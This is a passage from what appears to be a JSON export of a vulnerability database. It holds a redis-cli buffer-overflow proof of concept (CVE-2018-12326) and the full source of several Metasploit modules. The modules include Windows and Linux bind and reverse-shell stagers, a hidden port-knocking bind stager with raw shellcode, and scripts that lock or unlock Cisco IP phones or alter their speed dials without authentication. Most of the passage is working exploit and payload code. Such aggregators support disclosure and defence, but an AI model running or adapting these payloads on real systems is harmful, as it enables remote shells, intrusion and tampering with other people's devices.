[2018-06-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30598"}], "exploitdb": [{"lastseen": "2018-06-18T20:26:52", "bulletinFamily": "exploit", "description": "Redis-cli < 5.0 - Buffer Overflow (PoC). CVE-2018-12326. Local exploit for Linux platform", "modified": "2018-06-18T00:00:00", "published": "2018-06-18T00:00:00", "id": "EDB-ID:44904", "href": "https://www.exploit-db.com/exploits/44904/", "type": "exploitdb", "title": "Redis-cli < 5.0 - Buffer Overflow (PoC)", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\r\n# Date: 2018-06-13\r\n# Exploit Author: Fakhri Zulkifli\r\n# Vendor Homepage: https://redis.io/\r\n# Software Link: https://redis.io/download\r\n# Version: 5.0, 4.0, 3.2\r\n# Fixed on: 5.0, 4.0, 3.2\r\n# CVE : CVE-2018-12326\r\n\r\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\r\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\r\n\r\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\r\nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\r\n\r\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\r\n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\r\n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5\r\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\r\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\r\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44904/"}], "packetstorm": [{"lastseen": "2018-06-19T02:07:57", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-18T00:00:00", "published": "2018-06-18T00:00:00", "id": "PACKETSTORM:148225", "href": "https://packetstormsecurity.com/files/148225/Redis-cli-Buffer-Overflow.html", "title": "Redis-cli Buffer Overflow", "type": "packetstorm", "sourceData": "`# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC) \n# Date: 2018-06-13 \n# Exploit Author: Fakhri Zulkifli \n# Vendor Homepage: https://redis.io/ \n# Software Link: https://redis.io/download \n# Version: 5.0, 4.0, 3.2 \n# Fixed on: 5.0, 4.0, 3.2 \n# CVE : CVE-2018-12326 \n \n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker \n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter. \n \n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'` \nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known \n \n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566 \n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637 \n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5 \n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9 \n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 \n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8) \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148225/rediscli-overflow.txt"}], "cve": [{"lastseen": "2019-07-26T11:38:47", "bulletinFamily": "NVD", "description": "Buffer overflow in redis-cli of Redis before 4.0.10 and 5.x before 5.0 RC3 allows an attacker to achieve code execution and escalate to higher privileges via a crafted command line. NOTE: It is unclear whether there are any common situations in which redis-cli is used with, for example, a -h (aka hostname) argument from an untrusted source.", "modified": "2019-01-17T11:29:00", "id": "CVE-2018-12326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12326", "published": "2018-06-17T14:29:00", "title": "CVE-2018-12326", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-11-25T21:40:31", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)\n", "modified": "2018-02-15T23:37:33", "published": "2018-02-12T01:56:50", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/BIND_NAMED_PIPE", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_named_pipe'\nrequire 'msf/core/payload/windows/x64/bind_named_pipe'\n\nmodule MetasploitModule\n\n CachedSize = 481\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindNamedPipe_x64\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Bind Named Pipe Stager',\n 'Description' => 'Listen for a pipe connection (Windows x64)',\n 'Author' => [ 'UserExistsError' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindNamedPipe,\n 'Convention' => 'sockrdi', # hPipe\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/bind_named_pipe.rb"}, {"lastseen": "2019-12-03T04:59:04", "bulletinFamily": "exploit", "description": "This module allows an unauthenticated attacker to exercise the \"Lock\" and \"Unlock\" functionality of Telisca IPS Lock for Cisco IP Phones. This module should be run in the VoIP VLAN, and requires knowledge of the target phone's name (for example, SEP002497AB1D4B). Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.\n", "modified": "2017-07-24T13:26:21", "published": "2016-01-15T01:45:00", "id": "MSF:AUXILIARY/VOIP/TELISCA_IPS_LOCK_CONTROL", "href": "", "type": "metasploit", "title": "Telisca IPS Lock Cisco IP Phone Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Telisca IPS Lock Cisco IP Phone Control',\n 'Description' => %q{\n This module allows an unauthenticated attacker to exercise the\n \"Lock\" and \"Unlock\" functionality of Telisca IPS Lock for Cisco IP\n Phones. This module should be run in the VoIP VLAN, and requires\n knowledge of the target phone's name (for example, SEP002497AB1D4B).\n\n Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.\n },\n 'References' =>\n [\n # Publicly disclosed via Metaploit PR\n 'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'\n ],\n 'Author' =>\n [\n 'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',\n 'zirsalem'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Dec 17 2015',\n 'Actions' =>\n [\n ['LOCK', 'Description' => 'To lock a phone'],\n ['UNLOCK', 'Description' => 'To unlock a phone']\n ],\n 'DefaultAction' => 'UNLOCK'\n ))\n\n register_options(\n [\n OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),\n OptString.new('PHONENAME', [true, 'The name of the target phone'])\n ])\n\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_good(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n # Returns the status of the listening port.\n #\n # @return [Boolean] TrueClass if port open, otherwise FalseClass.\n def port_open?\n begin\n res = send_request_raw({'method' => 'GET', 'uri' => '/'})\n return true if res\n rescue ::Rex::ConnectionRefused\n vprint_status(\"Connection refused\")\n rescue ::Rex::ConnectionError\n vprint_error(\"Connection failed\")\n rescue ::OpenSSL::SSL::SSLError\n vprint_error(\"SSL/TLS connection error\")\n end\n\n false\n end\n\n # Locks a device.\n #\n # @param phone_name [String] Name of the phone used for the pn parameter.\n #\n # @return [void]\n def lock(phone_name)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/IPSPCFG/user/Default.aspx',\n 'headers' => {\n 'Connection' => 'keep-alive',\n 'Accept-Language' => 'en-US,en;q=0.5'\n },\n 'vars_get' => {\n 'action' => 'DO',\n 'tg' => 'L',\n 'pn' => phone_name,\n 'dp' => '',\n 'gr' => '',\n 'gl' => ''\n }\n })\n\n if res && res.code == 200\n if res.body.include?('Unlock') || res.body.include?('U7LCK')\n print_good(\"The device #{phone_name} is already locked\")\n elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT')\n print_good(\"Device #{phone_name} successfully locked\")\n end\n elsif res\n print_error(\"Unexpected response #{res.code}\")\n else\n print_error('The connection timed out while trying to lock.')\n end\n end\n\n\n # Unlocks a phone.\n #\n # @param phone_name [String] Name of the phone used for the pn parameter.\n #\n # @return [void]\n def unlock(phone_name)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/IPSPCFG/user/Default.aspx',\n 'headers' => {\n 'Connection' => 'keep-alive',\n 'Accept-Language' => 'en-US,en;q=0.5'\n },\n 'vars_get' => {\n 'action' => 'U7LCK',\n 'pn' => phone_name,\n 'dp' => ''\n }\n })\n\n if res && res.code == 200\n if res.body.include?('Unlock') || res.body.include?('U7LCK')\n print_good(\"The device #{phone_name} is already locked\")\n elsif res.body.include?('unlocked') || res.body.include?('QUIT')\n print_good(\"The device #{phone_name} successfully unlocked\")\n end\n elsif res\n print_error(\"Unexpected response #{res.code}\")\n else\n print_error('The connection timed out while trying to unlock')\n end\n end\n\n\n def run\n unless port_open?\n print_error('The web server is unreachable!')\n return\n end\n\n phone_name = datastore['PHONENAME']\n case action.name\n when 'LOCK'\n lock(phone_name)\n when 'UNLOCK'\n unlock(phone_name)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/voip/telisca_ips_lock_control.rb"}, {"lastseen": "2019-11-24T21:39:01", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-25T01:21:28", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/BIND_IPV6_TCP_UUID", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/x64/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 526\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcp_x64\n\n def self.handler_type_alias\n \"bind_ipv6_tcp_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 IPv6 Bind TCP Stager with UUID Support',\n 'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x64)',\n 'Author' => [ 'sf', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb"}, {"lastseen": "2019-11-28T12:06:16", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-25T01:21:28", "id": "MSF:PAYLOAD/WINDOWS/SHELL/BIND_IPV6_TCP_UUID", "href": "", "type": "metasploit", "title": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 318\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcp\n\n def self.handler_type_alias\n \"bind_ipv6_tcp_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind IPv6 TCP Stager with UUID Support (Windows x86)',\n 'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x86)',\n 'Author' => [ 'hdm', 'skape', 'sf', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb"}, {"lastseen": "2019-10-09T00:05:02", "bulletinFamily": "exploit", "description": "Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-18T11:19:04", "id": "MSF:PAYLOAD/LINUX/X86/SHELL/BIND_IPV6_TCP_UUID", "href": "", "type": "metasploit", "title": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/linux/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 165\n\n include Msf::Payload::Stager\n include Msf::Payload::Linux::BindTcp\n\n def self.handler_type_alias\n 'bind_ipv6_tcp_uuid'\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind IPv6 TCP Stager with UUID Support (Linux x86)',\n 'Description' => 'Listen for an IPv6 connection with UUID Support (Linux x86)',\n 'Author' => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => true }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb"}, {"lastseen": "2019-11-17T09:19:38", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support\n", "modified": "2018-02-15T21:10:26", "published": "2015-05-15T02:27:25", "id": "MSF:PAYLOAD/WINDOWS/SHELL/REVERSE_TCP_UUID", "href": "", "type": "metasploit", "title": "Windows Command Shell, Reverse TCP Stager with UUID Support", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 316\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcp\n\n def self.handler_type_alias\n 'reverse_tcp_uuid'\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager with UUID Support',\n 'Description' => 'Connect back to the attacker with UUID Support',\n 'Author' => [ 'hdm', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\n\n #\n # Override the uuid function and opt-in for sending the\n # UUID in the stage.\n #\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_uuid.rb"}, {"lastseen": "2019-12-03T20:35:13", "bulletinFamily": "exploit", "description": "The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM), before version 10, doesn't implement access control properly, which allows remote attackers to modify user information. This module exploits the vulnerability to make unauthorized speed dial entity manipulations.\n", "modified": "2017-08-29T00:17:58", "published": "2015-01-10T06:29:28", "id": "MSF:AUXILIARY/VOIP/CISCO_CUCDM_SPEED_DIALS", "href": "", "type": "metasploit", "title": "Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',\n 'Description' => %q{\n The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager\n (CDM), before version 10, doesn't implement access control properly, which allows remote\n attackers to modify user information. This module exploits the vulnerability to make\n unauthorized speed dial entity manipulations.\n },\n 'Author' => 'fozavci',\n 'References' =>\n [\n ['CVE', '2014-3300'],\n ['BID', '68331']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],\n [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],\n [ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],\n [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]\n ],\n 'DefaultAction' => 'List'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),\n OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),\n OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),\n OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),\n OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),\n ])\n end\n\n def run\n\n case action.name.upcase\n when 'MODIFY'\n modify\n when 'DELETE'\n delete\n when 'ADD'\n add\n when 'LIST'\n list\n end\n\n end\n\n def send_rcv(uri, vars_get)\n uri = normalize_uri(target_uri.to_s, uri.to_s)\n res = send_request_cgi(\n {\n 'uri' => uri,\n 'method' => 'GET',\n 'vars_get' => vars_get\n })\n\n if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/\n return Exploit::CheckCode::Vulnerable, res\n else\n print_error(\"Target appears not vulnerable!\")\n return Exploit::CheckCode::Safe, res\n end\n end\n\n def parse(res)\n doc = REXML::Document.new(res.body)\n names = []\n phones = []\n\n list = doc.root.get_elements('DirectoryEntry')\n list.each do |lst|\n xlist = lst.get_elements('Name')\n xlist.each {|l| names << \"#{l[0]}\"}\n xlist = lst.get_elements('Telephone')\n xlist.each {|l| phones << \"#{l[0]}\" }\n end\n\n if names.size > 0\n names.size.times do |i|\n info = ''\n info << \"Position: #{names[i].split(\":\")[0]}, \"\n info << \"Name: #{names[i].split(\":\")[1]}, \"\n info << \"Telephone: #{phones[i]}\"\n\n print_good(\"#{info}\")\n end\n else\n print_status(\"No Speed Dial detected\")\n end\n end\n\n def list\n mac = datastore['MAC']\n\n print_status(\"Getting Speed Dials of the IP phone\")\n vars_get = {\n 'device' => \"SEP#{mac}\"\n }\n\n status, res = send_rcv('speeddials.cgi', vars_get)\n parse(res) unless status == Exploit::CheckCode::Safe\n end\n\n def add\n mac = datastore['MAC']\n name = datastore['NAME']\n position = datastore['POSITION']\n telno = datastore['TELNO']\n\n print_status(\"Adding Speed Dial to the IP phone\")\n vars_get = {\n 'name' => \"#{name}\",\n 'telno' => \"#{telno}\",\n 'device' => \"SEP#{mac}\",\n 'entry' => \"#{position}\",\n 'mac' => \"#{mac}\"\n }\n status, res = send_rcv('phonespeedialadd.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/\n print_good(\"Speed Dial #{position} is added successfully\")\n elsif res && res.body && res.body.to_s =~ /exist/\n print_error(\"Speed Dial is exist, change the position or choose modify!\")\n else\n print_error(\"Speed Dial couldn't add!\")\n end\n end\n\n def delete\n mac = datastore['MAC']\n position = datastore['POSITION']\n\n print_status(\"Deleting Speed Dial of the IP phone\")\n\n vars_get = {\n 'entry' => \"#{position}\",\n 'device' => \"SEP#{mac}\"\n }\n\n status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/\n print_good(\"Speed Dial #{position} is deleted successfully\")\n else\n print_error(\"Speed Dial is not found!\")\n end\n end\n\n def modify\n mac = datastore['MAC']\n name = datastore['NAME']\n position = datastore['POSITION']\n telno = datastore['TELNO']\n\n print_status(\"Deleting Speed Dial of the IP phone\")\n\n vars_get = {\n 'entry' => \"#{position}\",\n 'device' => \"SEP#{mac}\"\n }\n\n status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/\n print_good(\"Speed Dial #{position} is deleted successfully\")\n print_status(\"Adding Speed Dial to the IP phone\")\n\n vars_get = {\n 'name' => \"#{name}\",\n 'telno' => \"#{telno}\",\n 'device' => \"SEP#{mac}\",\n 'entry' => \"#{position}\",\n 'mac' => \"#{mac}\"\n }\n\n status, res = send_rcv('phonespeedialadd.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/\n print_good(\"Speed Dial #{position} is added successfully\")\n elsif res && res.body =~ /exist/\n print_error(\"Speed Dial is exist, change the position or choose modify!\")\n else\n print_error(\"Speed Dial couldn't add!\")\n end\n else\n print_error(\"Speed Dial is not found!\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/voip/cisco_cucdm_speed_dials.rb"}, {"lastseen": "2019-12-01T18:24:35", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as \"closed,\" thus helping to hide the shellcode\n", "modified": "2017-07-24T13:26:21", "published": "2014-12-27T21:03:45", "id": "MSF:PAYLOAD/WINDOWS/SHELL/BIND_HIDDEN_IPKNOCK_TCP", "href": "", "type": "metasploit", "title": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\n\n\nmodule MetasploitModule\n\n CachedSize = 359\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows\n\n\n def self.handler_type_alias\n \"bind_hidden_ipknock_tcp\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Hidden Bind Ipknock TCP Stager',\n 'Description' => 'Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode',\n 'Author' =>\n [\n 'hdm', # original payload module (stager bind_tcp)\n 'skape', # original payload module (stager bind_tcp)\n 'sf', # original payload module (stager bind_tcp)\n 'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden Ipknock functionality\n ],\n 'License' => MSF_LICENSE,\n 'References' => ['URL', 'http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html'],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n {\n 'RequiresMidstager' => false,\n 'Offsets' =>\n {\n 'LPORT' => [ 193, 'n' ],\n 'KHOST' => [ 255, 'ADDR' ]\n },\n 'Payload' =>\n # Length: 359 bytes\n \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\" +\n \"\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\" +\n \"\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\" +\n \"\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\" +\n \"\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\" +\n \"\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\" +\n \"\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\" +\n \"\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\" +\n \"\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\" +\n \"\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\" +\n \"\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\" +\n \"\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x31\\xdb\\x53\\x68\\x02\" +\n \"\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\\xdb\\x37\\x67\\xff\\xd5\" +\n \"\\x6a\\x01\\x54\\x68\\x02\\x30\\x00\\x00\\x68\\xff\\xff\\x00\\x00\\x57\\x68\\xf1\" +\n \"\\xa2\\x77\\x29\\xff\\xd5\\x53\\x57\\x68\\xb7\\xe9\\x38\\xff\\xff\\xd5\\x53\\xe8\" +\n \"\\x1a\\x00\\x00\\x00\\x8b\\x44\\x24\\x04\\x8b\\x40\\x04\\x8b\\x40\\x04\\x2d\\xc0\" +\n \"\\xa8\\x01\\x21\\x74\\x03\\x31\\xc0\\x40\\x89\\x45\\x54\\xc2\\x20\\x00\\x53\\x53\" +\n \"\\x57\\x68\\x94\\xac\\xbe\\x33\\xff\\xd5\\x83\\x7c\\x24\\x04\\x00\\x75\\xcf\\x40\" +\n \"\\x75\\x06\\x53\\x53\\xeb\\xe8\\x74\\xc6\\x48\\x57\\x97\\x68\\x75\\x6e\\x4d\\x61\" +\n \"\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x8b\" +\n \"\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\" +\n \"\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\" +\n \"\\x01\\xc3\\x29\\xc6\\x75\\xee\\xc3\"\n }\n ))\n\n register_options([\n OptAddress.new('KHOST', [true, \"IP address allowed\", nil])\n ])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 